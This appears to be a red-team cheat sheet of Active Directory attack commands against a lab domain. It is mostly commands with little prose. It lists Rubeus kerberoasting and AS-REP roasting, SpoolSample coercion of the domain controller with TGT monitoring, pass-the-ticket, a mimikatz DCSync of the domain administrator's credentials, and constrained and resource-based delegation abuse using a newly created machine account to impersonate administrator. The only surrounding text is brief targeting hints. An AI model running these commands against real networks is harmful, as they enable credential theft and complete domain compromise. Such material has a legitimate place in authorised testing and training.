Check for GPOs that grant a group of users remote access (PsExec, WMI, WinRM, RDP, etc.) to specific hosts.
rubeus.exe kerberoast /user:svc_sql /nowrap
rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap
rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap
Spoolsample.exe reddc redsqlw
rubeus.exe ptt /ticket:[ticket]
mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator
rubeus.exe tgtdeleg /nowrap
rubeus.exe s4u /impersonateuser:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt
ipmo .\powermad.ps1
New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)
ipmo .\Microsoft.ActiveDirectory.Management.dll
Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose
rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
If it is not directly accessible, use SOCKS to access it.
Any computer or user name that contains "web", "svc", etc.